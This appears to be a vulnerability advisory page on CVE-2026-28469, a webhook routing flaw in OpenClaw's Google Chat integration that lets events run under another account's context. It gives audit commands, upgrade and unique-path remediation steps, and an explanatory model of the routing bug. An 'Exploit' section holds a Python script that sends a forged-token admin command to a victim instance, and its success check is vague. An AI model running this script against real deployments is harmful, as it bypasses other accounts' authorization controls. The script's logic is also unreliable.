CVE-2026-28469 is a critical vulnerability in OpenClaw versions prior to 2026.2.14, specifically within the Google Chat monitor component. The flaw arises when multiple webhook targets are registered on the same HTTP path. In such a configuration, request verification relies on first-match semantics: it iterates through the registered targets and selects the first one that passes the `verifyGoogleChatRequest` check. If more than one target can verify a request, for instance because the targets perform equivalent audience validation, the inbound webhook event is processed in the context of the first matching account rather than the intended one. The result is a cross-account policy context misrouting, where an event meant for one account is handled by another, effectively bypassing the intended allowlists, session policies, and authorization controls. The vulnerability is classified under CWE-639 (authorization bypass through user-controlled key, the insecure direct object reference family). The issue is fixed in OpenClaw version 2026.2.14; users are advised to upgrade immediately or, as a workaround, ensure every webhook target uses a unique path.
DailyCVE Form:
Platform: npm openclaw
Version: < 2026.2.14
Vulnerability: Authorization context misrouting
Severity: Critical
Date: 2026-03-05
Prediction: Patched 2026-03-05
What Undercode Says:
Analytics
```bash
# Check current OpenClaw version
openclaw --version

# Inspect configured Google Chat webhook paths
grep -A 10 "channels.googlechat" ~/.openclaw/config.yaml | grep "path"

# List all registered webhook targets
grep -r "webhook:" ~/.openclaw/channels/googlechat/

# Test if multiple targets share a path (prints each duplicated path once)
jq '.channels.googlechat.webhooks[].path' ~/.openclaw/config.json | sort | uniq -d

# Simulate ambiguous webhook routing against a local instance
curl -X POST http://localhost:18789/googlechat/webhook \
  -H "Content-Type: application/json" \
  -d '{"type":"MESSAGE","message":{"text":"test"}}'

# Audit logs for cross-account processing
grep "googlechat.processed by account:" ~/.openclaw/logs/audit.log

# Verify the fix commit is applied
git log --oneline | grep 61d59a8

# Check for duplicate webhook paths across environment files
find ~/.openclaw/environments/ -name "*.yaml" -exec grep -H "path:" {} \;
```
Exploit
```python
import requests
import json

# Target OpenClaw instance with shared webhook path
target_url = "https://victim-openclaw.com/googlechat/webhook"

# Malicious payload crafted to be valid for multiple accounts
payload = {
    "type": "MESSAGE",
    "eventTime": "2026-03-10T12:00:00.000Z",
    "message": {
        "sender": {"email": "[email protected]"},
        "text": "!admin_command",
        "annotations": []
    },
    "space": {"name": "spaces/attacker-space"}
}

# Headers that might pass verification for multiple contexts
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer eyJhb...",  # Forged or captured token
    "X-Goog-Channel-Id": "shared-channel-123",
    "X-Goog-Resource-Id": "resource-456"
}

# Send the request to trigger first-match misrouting
response = requests.post(target_url, headers=headers, data=json.dumps(payload))
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# Check if command executed under wrong context
verify_url = "https://victim-openclaw.com/api/admin/status"
admin_check = requests.get(verify_url, headers={"Authorization": "Bearer user-token"})
if "unauthorized" not in admin_check.text.lower():
    print("[!] Exploit likely succeeded - accessed admin context")
```
Protection
1. Upgrade to the patched version immediately
```bash
npm install -g openclaw@2026.2.14
```
2. Verify the upgrade
```bash
openclaw --version   # must show 2026.2.14 or higher
```
3. Apply the workaround: ensure unique webhook paths
```bash
# Backup current config
cp ~/.openclaw/config.yaml ~/.openclaw/config.yaml.bak

# Edit configuration to assign unique paths per target
openclaw config set channels.googlechat.webhooks[0].path "/googlechat/account1"
openclaw config set channels.googlechat.webhooks[1].path "/googlechat/account2"
```
4. Restrict webhook verification to prevent ambiguity
```bash
openclaw config set channels.googlechat.strict_verification true
```
5. Add unique identifiers to each webhook target
```bash
openclaw config set channels.googlechat.webhooks[0].audience "account1-only"
openclaw config set channels.googlechat.webhooks[1].audience "account2-only"
```
6. Enable detailed webhook routing logs
```bash
openclaw config set logging.webhook_routing true
openclaw config set logging.level debug
```
7. Restart the OpenClaw service
```bash
systemctl --user restart openclaw
```
8. Validate the fix by testing routing isolation
```bash
curl -X POST http://localhost:18789/googlechat/account1 \
  -H "Content-Type: application/json" \
  -d '{"type":"MESSAGE","message":{"text":"test1"}}'

curl -X POST http://localhost:18789/googlechat/account2 \
  -H "Content-Type: application/json" \
  -d '{"type":"MESSAGE","message":{"text":"test2"}}'

# Check logs for correct context assignment
tail -f ~/.openclaw/logs/audit.log | grep "webhook.processed"
```
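To make the first-match behaviour described in the summary concrete, and to give the unique-path workaround in step 3 a checkable form, here is an added Python model. It is not OpenClaw's code: the `WebhookTarget` and `InboundEvent` records, the `verify_request` stand-in for `verifyGoogleChatRequest`, the account names, paths and audience values are all constructed assumptions. It contrasts the vulnerable first-match dispatcher with one that refuses ambiguous matches, and includes the duplicate-path audit that the workaround relies on. It goes one step beyond the page by also showing that once paths are unique, both dispatchers resolve the same, correct account.

```python
"""Model of the webhook-target routing flaw behind CVE-2026-28469.

Added example, not OpenClaw's implementation. All records, names and the
verification rule are constructed stand-ins.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class WebhookTarget:
    account: str                 # account whose policy context the target runs under
    path: str                    # HTTP path the target is registered on
    audience: str                # audience the inbound request must be verified against
    allowlist: frozenset = field(default_factory=frozenset)  # senders this account accepts


@dataclass(frozen=True)
class InboundEvent:
    path: str                    # path the webhook was delivered to
    audience: str                # audience carried by the (already verified) request
    sender: str                  # sender email from the event body


def verify_request(target: WebhookTarget, event: InboundEvent) -> bool:
    # Stand-in for verifyGoogleChatRequest (assumption): only the audience is
    # compared, so two targets configured with equivalent audience validation
    # accept the very same request.
    return event.audience == target.audience


def route_first_match(targets, event):
    """Vulnerable pattern: the first target on the path that verifies wins."""
    for t in targets:
        if t.path == event.path and verify_request(t, event):
            return t.account
    return None


def route_unambiguous(targets, event):
    """Hardened pattern: exactly one target must verify, otherwise reject."""
    matches = [t for t in targets if t.path == event.path and verify_request(t, event)]
    if len(matches) != 1:
        return None              # 0 = unverified, >1 = ambiguous; both are refused
    return matches[0].account


def policy_decision(targets, event, router):
    """Resolve the account, then apply that account's allowlist.

    Returns (account, allowed) or None when the event is dropped.
    """
    account = router(targets, event)
    if account is None:
        return None
    target = next(t for t in targets if t.account == account)
    return (account, event.sender in target.allowlist)


def shared_paths(targets):
    """Audit helper for the unique-path workaround: path -> accounts sharing it."""
    by_path = defaultdict(list)
    for t in targets:
        by_path[t.path].append(t.account)
    return {p: accts for p, accts in by_path.items() if len(accts) > 1}


# Constructed vulnerable configuration: two accounts share one path and audience.
TARGETS = [
    WebhookTarget("ops-bot", "/googlechat/webhook", "aud-shared", frozenset({"ops@example.com"})),
    WebhookTarget("guest-bot", "/googlechat/webhook", "aud-shared", frozenset({"guest@example.com"})),
]
# Constructed event intended for guest-bot, from a sender guest-bot allows.
EVENT = InboundEvent("/googlechat/webhook", "aud-shared", "guest@example.com")

# Same accounts after the workaround: one unique path per target.
FIXED_TARGETS = [
    WebhookTarget("ops-bot", "/googlechat/ops-bot", "aud-shared", frozenset({"ops@example.com"})),
    WebhookTarget("guest-bot", "/googlechat/guest-bot", "aud-shared", frozenset({"guest@example.com"})),
]
FIXED_EVENT = InboundEvent("/googlechat/guest-bot", "aud-shared", "guest@example.com")


if __name__ == "__main__":
    print("shared paths      :", shared_paths(TARGETS))
    print("first-match       :", policy_decision(TARGETS, EVENT, route_first_match))
    print("unambiguous       :", policy_decision(TARGETS, EVENT, route_unambiguous))
    print("fixed, first-match:", policy_decision(FIXED_TARGETS, FIXED_EVENT, route_first_match))
    print("fixed, unambiguous:", policy_decision(FIXED_TARGETS, FIXED_EVENT, route_unambiguous))
```

With the shared-path configuration, `route_first_match` hands the guest event to `ops-bot`, so it is evaluated against the wrong allowlist; `route_unambiguous` drops it instead of guessing. After the paths are made unique, `shared_paths` returns nothing and both dispatchers resolve `guest-bot`, which is why the workaround is sufficient even before the upgrade.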
Impact
Successful exploitation allows attackers to send webhook events that are processed under a different account's context. This bypasses the intended allowlists and session policies, enabling unauthorized actions such as executing commands, accessing data, or triggering functions with the privileges of another account. In shared-path deployments, this cross-account misrouting can lead to privilege escalation, data leakage, and complete loss of policy enforcement. The CVSS base score of 9.8 (Critical) reflects the network attack vector, low attack complexity, and high impact on confidentiality, integrity, and availability. Organizations running multi-tenant OpenClaw instances with Google Chat integrations are most at risk, especially where webhook targets share paths. The vulnerability requires no privileges or user interaction, so it is readily exploitable remotely. The fix introduces proper request verification and routing isolation so that events are always processed under the correct account context.
Sources:
Reported By: nvd.nist.gov